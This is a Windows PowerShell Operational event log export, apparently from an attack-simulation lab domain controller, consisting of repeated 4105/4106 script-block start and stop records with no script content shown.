Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473362
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473361
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473360
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473359
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473358
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473357
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473356
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473355
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473354
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473353
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473352
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473351
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473350
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473348
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473347
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473346
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473345
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473344
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473343
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473342
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473341
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473340
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473339
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473338
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473337
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473336
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473335
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473334
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473333
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473332
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473331
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473330
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473329
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473328
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473327
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473326
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473325
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473324
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473323
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473322
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473321
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473320
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473319
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473318
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473317
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473316
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473315
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473314
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473313
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473312
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473311
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473310
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473309
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
